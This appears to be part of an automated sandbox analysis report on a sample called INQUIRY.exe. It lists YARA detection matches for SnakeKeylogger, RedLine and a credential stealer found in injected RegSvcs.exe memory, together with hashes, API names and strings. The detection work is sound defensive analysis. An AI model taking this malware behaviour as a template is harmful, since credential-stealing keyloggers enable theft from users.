              Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: This is a third-party compiled AutoIt script.0_2_00A13B3A
              Source: INQUIRY.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: INQUIRY.exe, 00000000.00000000.1684609381.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f82093b0-a
              Source: INQUIRY.exe, 00000000.00000000.1684609381.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7cd83991-d
              Source: INQUIRY.exe, 00000002.00000002.1709099077.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2f1ef72a-1
              Source: INQUIRY.exe, 00000002.00000002.1709099077.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ceded60a-d
              Source: INQUIRY.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_634a5bec-0
              Source: INQUIRY.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7f90e5e2-b
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00A7A1EF
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A68310
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00A751BD
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A1E6A00_2_00A1E6A0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3D9750_2_00A3D975
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A321C50_2_00A321C5
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A462D20_2_00A462D2
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A903DA0_2_00A903DA
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A4242E0_2_00A4242E
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A325FA0_2_00A325FA
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A266E10_2_00A266E1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A6E6160_2_00A6E616
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A4878F0_2_00A4878F
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A788890_2_00A78889
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A288080_2_00A28808
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A468440_2_00A46844
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A908570_2_00A90857
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3CB210_2_00A3CB21
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A46DB60_2_00A46DB6
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A26F9E0_2_00A26F9E
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A230300_2_00A23030
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A331870_2_00A33187
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3F1D90_2_00A3F1D9
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A112870_2_00A11287
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A314840_2_00A31484
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A255200_2_00A25520
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A376960_2_00A37696
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A257600_2_00A25760
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A319780_2_00A31978
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A49AB50_2_00A49AB5
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A1FCE00_2_00A1FCE0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3BDA60_2_00A3BDA6
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A31D900_2_00A31D90
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A97DDB0_2_00A97DDB
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A23FE00_2_00A23FE0
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A1DF000_2_00A1DF00
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_01DA36000_2_01DA3600
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_010136002_2_01013600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DC113_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00407C3F3_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418CCC3_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00406CA03_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004028B03_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A4BE3_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182443_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004016503_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F203_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004193C43_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187883_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F893_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402B903_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004073A03_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA14373_2_02BA1437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA14483_2_02BA1448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA11A83_2_02BA11A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA11993_2_02BA1199
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C636483_2_06C63648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C622A03_2_06C622A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00A30AE3 appears 70 times
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00A17DE1 appears 35 times
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00A38900 appears 42 times
              Source: INQUIRY.exe, 00000000.00000003.1692843757.0000000003CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs INQUIRY.exe
              Source: INQUIRY.exe, 00000000.00000003.1693108053.0000000003B33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000002.00000003.1708283244.00000000039D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000002.00000003.1702806838.0000000003B3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
              Source: INQUIRY.exe, 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs INQUIRY.exe
              Source: INQUIRY.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 0.2.INQUIRY.exe.1db0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3f86458.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d10bbe.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3fae590.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.INQUIRY.exe.1de0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d10bbe.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.3f85570.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d11aa6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.5630000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
